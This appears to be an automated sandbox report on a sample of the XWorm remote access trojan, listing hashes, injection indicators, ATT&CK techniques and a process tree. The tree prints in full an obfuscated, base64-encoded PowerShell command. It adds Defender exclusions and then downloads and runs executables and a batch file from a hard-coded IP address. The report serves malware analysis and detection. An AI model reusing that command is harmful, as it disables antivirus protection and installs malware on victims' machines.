96f92d251a44edad3994c0bc22bd063124fbdf0c18eae81f2a35119542546f0c

Analysis

max time kernel
121s
max time network
123s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
19/11/2024, 17:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

XWorm-Remote-Access-Tool-main/xworm.exe
Size

227KB
MD5

f25ef9e7998ae6d7db70c919b1d9636b
SHA1

572146d53d0d7b3c912bc6a24f458d67b77a53fe
SHA256

7face24db4aa43220ebc4d3afb6c739307f8b653c686b829fb1cb6091695c113
SHA512

d8682cdb5876f9ffe6aa8856d5ffa8c168afd25fc927781d80d129491fa04aabf045f01d13ffb51e3db9773367cc00fce466e1ef7af11bfc3d7af13df06cc17c
SSDEEP

6144:YdAfHWAy5hne6jlVg1jCYRCuAOm6Tw8ym:Yqf7y5he6DkQutw8ym

Score

8^/10

defense_evasion discovery

Malware Config

Signatures

Blocklisted process makes network request 4 IoCs

flow	pid	Process
4	2852	powershell.exe
7	2852	powershell.exe
8	2852	powershell.exe
9	2852	powershell.exe

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2440 set thread context of 2156	2440	xworm.exe	32

Program crash 1 IoCs

pid	pid_target	Process	procid_target
2384	2440	WerFault.exe	29

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xworm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AppLaunch.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2852	powershell.exe
2852	powershell.exe
2852	powershell.exe
2704	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2852	powershell.exe
Token: SeDebugPrivilege	2704	powershell.exe

Suspicious use of WriteProcessMemory 44 IoCs

description	pid	Process	procid_target
PID 2440 wrote to memory of 2492	2440	xworm.exe	30
PID 2440 wrote to memory of 2492	2440	xworm.exe	30
PID 2440 wrote to memory of 2492	2440	xworm.exe	30
PID 2440 wrote to memory of 2492	2440	xworm.exe	30
PID 2440 wrote to memory of 2492	2440	xworm.exe	30
PID 2440 wrote to memory of 2492	2440	xworm.exe	30
PID 2440 wrote to memory of 2492	2440	xworm.exe	30
PID 2440 wrote to memory of 2248	2440	xworm.exe	31
PID 2440 wrote to memory of 2248	2440	xworm.exe	31
PID 2440 wrote to memory of 2248	2440	xworm.exe	31
PID 2440 wrote to memory of 2248	2440	xworm.exe	31
PID 2440 wrote to memory of 2248	2440	xworm.exe	31
PID 2440 wrote to memory of 2248	2440	xworm.exe	31
PID 2440 wrote to memory of 2248	2440	xworm.exe	31
PID 2440 wrote to memory of 2156	2440	xworm.exe	32
PID 2440 wrote to memory of 2156	2440	xworm.exe	32
PID 2440 wrote to memory of 2156	2440	xworm.exe	32
PID 2440 wrote to memory of 2156	2440	xworm.exe	32
PID 2440 wrote to memory of 2156	2440	xworm.exe	32
PID 2440 wrote to memory of 2156	2440	xworm.exe	32
PID 2440 wrote to memory of 2156	2440	xworm.exe	32
PID 2440 wrote to memory of 2156	2440	xworm.exe	32
PID 2440 wrote to memory of 2156	2440	xworm.exe	32
PID 2440 wrote to memory of 2156	2440	xworm.exe	32
PID 2440 wrote to memory of 2156	2440	xworm.exe	32
PID 2440 wrote to memory of 2156	2440	xworm.exe	32
PID 2440 wrote to memory of 2384	2440	xworm.exe	33
PID 2440 wrote to memory of 2384	2440	xworm.exe	33
PID 2440 wrote to memory of 2384	2440	xworm.exe	33
PID 2440 wrote to memory of 2384	2440	xworm.exe	33
PID 2156 wrote to memory of 2852	2156	AppLaunch.exe	34
PID 2156 wrote to memory of 2852	2156	AppLaunch.exe	34
PID 2156 wrote to memory of 2852	2156	AppLaunch.exe	34
PID 2156 wrote to memory of 2852	2156	AppLaunch.exe	34
PID 2156 wrote to memory of 2852	2156	AppLaunch.exe	34
PID 2156 wrote to memory of 2852	2156	AppLaunch.exe	34
PID 2156 wrote to memory of 2852	2156	AppLaunch.exe	34
PID 2852 wrote to memory of 2704	2852	powershell.exe	36
PID 2852 wrote to memory of 2704	2852	powershell.exe	36
PID 2852 wrote to memory of 2704	2852	powershell.exe	36
PID 2852 wrote to memory of 2704	2852	powershell.exe	36
PID 2852 wrote to memory of 2704	2852	powershell.exe	36
PID 2852 wrote to memory of 2704	2852	powershell.exe	36
PID 2852 wrote to memory of 2704	2852	powershell.exe	36

C:\Users\Admin\AppData\Local\Temp\XWorm-Remote-Access-Tool-main\xworm.exe
"C:\Users\Admin\AppData\Local\Temp\XWorm-Remote-Access-Tool-main\xworm.exe"
1⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2440
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
  2⤵
  PID:2492
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
  2⤵
  PID:2248
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2156
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAeQBsACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBtACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcASQBuAGoAZQBjAHQAaQBvAG4AIABlAHIAcgBvAHIAIQAgAEYAaQBsAGUAIABtAHUAcwB0ACAAYgBlACAAcwB0AGEAcgB0AGUAZAAgAGEAcwAgAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIQAnACwAJwAnACwAJwBPAEsAJwAsACcARQByAHIAbwByACcAKQA8ACMAYwB1AGsAIwA+ADsAIgA7ADwAIwBsAG0AbQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAcQBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAZABrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAegB5ACMAPgA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADAAOQAuADEANgAwAC4ANwAwAC8AWQBlAGwAbABvAHcALgBlAHgAZQAnACwAIAA8ACMAdgBqAGoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB6AGMAcAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB1AGIAZAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAGkAYwBnAGUAdAAuAGUAeABlACcAKQApADwAIwB3AGwAZgAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADAAOQAuADEANgAwAC4ANwAwAC8AYQB2AGQAaQBzAGEAYgBsAGUALgBiAGEAdAAnACwAIAA8ACMAZAB3AGgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAGQAcwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB5AGwAdAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBBAHYAZABpAHMALgBiAGEAdAAnACkAKQA8ACMAcABmAG0AIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwADoALwAvADEAOAA1AC4AMgAwADkALgAxADYAMAAuADcAMAAvAEwAaQBjAGUAbgBzAGUAQwBoAGUAYwBrAGUAcgAuAGUAeABlACcALAAgADwAIwBiAHMAbAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHcAdgBzACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHMAYQB3ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAaQBjAGUAbgBjAGUAQwBoAGUAYwBrAC4AZQB4AGUAJwApACkAPAAjAHEAdQBzACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwAxADgANQAuADIAMAA5AC4AMQA2ADAALgA3ADAALwBQAEwAVgAuAGUAeABlACcALAAgADwAIwBrAGcAZwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAagB2ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHQAYgBqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFAATABUAGUAcwB0AC4AZQB4AGUAJwApACkAPAAjAGEAaQBsACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGYAeQBqACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB4AHEAbQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAGkAYwBnAGUAdAAuAGUAeABlACcAKQA8ACMAcwB2AGYAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdgBkAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAZwBsACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEEAdgBkAGkAcwAuAGIAYQB0ACcAKQA8ACMAagBpAHgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAaQByAG4AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGIAdwB6ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAaQBjAGUAbgBjAGUAQwBoAGUAYwBrAC4AZQB4AGUAJwApADwAIwB4AHcAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBpAGMAZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdwBnAGgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUABMAFQAZQBzAHQALgBlAHgAZQAnACkAPAAjAHoAZgBsACMAPgA="
    3⤵
    - Blocklisted process makes network request
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2852
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#vmm#>[System.Windows.Forms.MessageBox]::Show('Injection error! File must be started as Administrator!','','OK','Error')<#cuk#>;
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2704
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2440 -s 72
  2⤵
  - Program crash
  PID:2384

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
9eb6c2e4066adad9b847fd4c612b8380

SHA1
79b93717a7dbcb104d1bab1e4b9ea0acef0bc91d

SHA256
6341eccae4795662311bdaeee867e770d612949d745a5c98d1df83fe03cfe610

SHA512
e9fc2c36deaaf91fde7146be1b315ac273d90c64a9e293355a7edd0c640e7d58b1db54a6ce037f65b5e0ff472ca61d0dd3066a79c63cb21a871424982c71d092

Download Submit
memory/2156-0-0x0000000000400000-0x000000000040A000-memory.dmp

Filesize
40KB

Download
memory/2156-4-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

Filesize
4KB

Download
memory/2156-5-0x0000000000400000-0x000000000040A000-memory.dmp

Filesize
40KB

Download
memory/2156-2-0x0000000000400000-0x000000000040A000-memory.dmp

Filesize
40KB

Download
memory/2156-3-0x0000000000400000-0x000000000040A000-memory.dmp

Filesize
40KB

Download
memory/2156-1-0x0000000000400000-0x000000000040A000-memory.dmp

Filesize
40KB

Download
memory/2156-7-0x0000000000400000-0x000000000040A000-memory.dmp

Filesize
40KB

Download
memory/2156-9-0x0000000000400000-0x000000000040A000-memory.dmp

Filesize
40KB

Download
memory/2156-10-0x000000007413E000-0x000000007413F000-memory.dmp

Filesize
4KB

Download